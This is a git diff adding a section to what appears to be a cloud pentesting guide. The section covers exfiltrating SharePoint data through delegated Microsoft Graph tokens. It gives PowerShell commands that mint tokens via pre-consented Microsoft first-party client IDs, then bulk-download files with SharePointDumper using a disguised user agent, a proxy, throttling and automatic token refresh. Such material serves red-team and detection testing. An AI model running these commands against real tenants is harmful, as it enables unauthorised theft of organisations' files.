diff --git a/src/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md index 4777919cf..85b9a8059 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md +++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md @@ -1176,6 +1176,63 @@ Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members {{#endtab }} {{#endtabs }} +## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper) + +Attackers with a **delegated Microsoft Graph token** that includes **`Sites.Read.All`** or **`Sites.ReadWrite.All`** can enumerate **sites/drives/items** over Graph and then **pull file contents** via **SharePoint pre-authentication download URLs** (time-limited URLs embedding an access token). The [SharePointDumper](https://github.com/zh54321/SharePointDumper) script automates the full flow (enumeration → pre-auth downloads) and emits per-request telemetry for detection testing. + +### Obtaining usable delegated tokens + +- SharePointDumper itself **does not authenticate**; supply an access token (optionally refresh token). +- Pre-consented **first-party clients** can be abused to mint a Graph token without registering an app. Example `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) invocations: + +```powershell +# CAE requested by default; yields long-lived (~24h) access token +Import-Module ./EntraTokenAid/EntraTokenAid.psm1 +$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE) + +# Other pre-consented clients +Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE) +Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE) +Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE) +Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE) +``` + +> [!NOTE] +> FOCI TRUE clients support refresh across devices; FOCI FALSE clients often require `-Origin` to satisfy reply URL origin validation. + +### Running SharePointDumper for enumeration + exfiltration + +- Basic dump with custom UA / proxy / throttling: + +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080' +``` + +- Scope control: include/exclude sites or extensions and global caps: + +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100 +``` + +- **Resume** interrupted runs (re-enumerates but skips downloaded items): + +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant +``` + +- **Automatic token refresh on HTTP 401** (requires EntraTokenAid loaded): + +```powershell +Import-Module ./EntraTokenAid/EntraTokenAid.psm1 +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74' +``` + +Operational notes: + +- Prefers **CAE-enabled** tokens to avoid mid-run expiry; refresh attempts are **not** logged in the tool’s API log. +- Generates **CSV/JSON request logs** for **Graph + SharePoint** and redacts embedded SharePoint download tokens by default (toggleable). +- Supports **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, and **Ctrl+C-safe shutdown** for traffic shaping during detection/IR tests. + ## Entra ID Privilege Escalation {{#ref}} @@ -1245,6 +1302,8 @@ The default mode is **Audit**: ## References - [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units) +- [SharePointDumper](https://github.com/zh54321/SharePointDumper) +- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid) {{#include ../../../banners/hacktricks-training.md}}